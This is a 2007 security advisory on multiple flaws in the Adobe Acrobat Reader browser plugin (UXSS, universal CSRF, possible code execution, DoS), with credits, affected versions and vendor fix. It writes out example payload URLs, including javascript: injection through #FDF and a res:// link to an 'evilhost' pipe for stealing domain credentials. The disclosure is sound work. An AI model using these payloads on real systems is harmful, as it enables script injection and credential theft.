THP Wisec USH DigitalBullets TheHackersPlace network
The WIse SECurity
.italian
.english
Wisec Home SecSearch Projects Papers Security Thoughts
 
News Search on Wisec
Google

Adobe Acrobat Reader Plugin - Multiple Vulnerabilities

Title:

Adobe Acrobat Reader Plugin - Multiple Vulnerabilities

Original Discovery and Research::

Stefano Di Paola

Contribution:

Giorgio Fedon (IE Dos, UXSS Analysis)
Elia Florio (Poc and Code Execution analysis)

Vulnerable:

Adobe Acrobat Reader Plugin <= 7.0.8

Type of Vulnerability:

Multiple (UXSS, UCRSF, Code Execution)

Tested On :

Firefox 1.5.0.7 and Below, 2.0RC2 under Windows XP SP2,
Firefox 1.5.0.7 and Below, 2.0RC2 under Ubuntu 6.06,
Internet Explorer SP2 under Windows XP SP2.

Updated Vulnerable Versions:
  • IE 6 on XP SP1 using Acrobat 7 Vulnerable
  • IE 6 on XP SP2 using Acrobat 4 Vulnerable
  • FireFox 1.5 using Reader 7 Vulnerable
  • FireFox 2.x using Reader 7 Vulnerable
  • Opera 9.10 using Reader 7 Vulnerable
  • Safari on PPC Mac using Acroread 8 Not Vulnerable

Vendor Status:

Vendor Informed on 15 October 2006, Adobe Released a fix on Version 8.0.0

Resources:

Presented at 23rd CCC Congress: Subverting Ajax, paper can be dowloaded here

Summary:

Adobe Acrobat plugin for Mozilla Firefox and IE (acroreader) is able to populate Portable Documents 
(PDF files) forms by supplying an external set of datas through the FDF, XML, or XFDF fields.
Implementation of FDF, XML, XFDF 
(http://partners.adobe.com/public/developer/en/acrobat/PDFOpenParameters.pdf) 
functionalities in Acrobat Reader Plugin is vulnerable to different kind of attacks.
Vulnerability extent changes from browser to browser:

1. Universal CSRF / session riding;
(Mozilla Firefox, Internet Explorer, Opera + Acrobat Reader plugin)

2. UXSS in #FDF, #XML e #XFDF;
(Mozilla Firefox + Acrobat Reader plugin)

3. Possible Remote Code Execution;
(Mozilla Firefox + Acrobat Reader plugin)

4. Denial of Service;
(Internet Explorer + Acrobat Reader plugin)

Description


1. Universal CSRF and session riding
This is probably Adobe related as all tested browsers (IE,Firefox,Opera) where affected. The issue is that by creating a special link like this: http://site.com/file.pdf#FDF=http://victim.com/index.html?param=... automatically Adobe plugin sends a request to 'victim.com' without user interaction asking for defined page in 'fdf' parameter. This could be used as a Universal Session Riding (aka UCSRF) attack which is a well known vulnerability. Note that the same effect is accomplished by using 'xml' and 'xfdf' parameters.
2. UXSS in #FDF, #XML e #XFDF
In addition by using the following request, is possible to execute javascript code inside Firefox browser: http://site.com/file.pdf#FDF=javascript:alert('Test Alert') The previous could be triggered against a site and because of this is a Universal Cross Site Scripting. UXSS is a particular type of Cross Site Scripting and has the ability to be triggered by exploiting flaws inside browsers, instead of leveraging the vulnerabilities against insecure web sites. It's also possible to force clients to download files by supplying: http://site.com/file.pdf#FDF=javascript:document.location= 'file://C:/winnt/notepad.exe' <Alternative_Attack> Alternative Attack using NamedPipes - http://www.514.es/2006/10/exploiting_win32_design_flaws.html In order to steal Domain credentials with explorer : http://anyhost/file.pdf#fdf=res://\\evilhost\pipe\apipe and then by applying techniques found in 514.es paper we found this kind of url and protocol (res://) could be used too. This means that also Internet Explorer could be abused in conjunction of Adobe plugin to make attacks on internal LANs and get victims credentials. </Alternative_Attack>
3. Possible Remote Code Execution
There is also a possible Remote code Execution by leveraging a memory corruption inside Firefox by supplying the following request: http://site.com/file.pdf#FDF=javascript:document.write('jjjjj...'); It's possible to cause a DoubleFree() error and to overwrite part of the Structural Exception Handler. Runtime vulnerability analisys The problem seems to be caused by a "Double MSVCRT.free()" executed by Acrobat plugin. The routine which cause Firefox to crash is located in the following call to NP_Shutdown(). Elia Florio is credited for Runtime analysis and exploitation. NB. The POC of this vulnerability won't be released.
4. Denial of Service (Internet Explorer only);
By supplying the following request via the web browser, it's possible to cause a denial of service in Internet Explorer: http://site.com/file.pdf#####...(More '#') The application is waiting for more inputs and allocates more memory.

Solution

Download it to fix the issue. Thanks to Adobe Psirt people, they where very kind and professional.

Disclaimer

In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Florence, 03rd January 2007

Wisec is brought to you by...

Wisec is written and mantained by Stefano Di Paola.

Wisec uses open standards, including XHTML, CSS2, and XML-RPC.

All Rights Reserved 2004
All hosted messages and metadata are owned by their respective authors.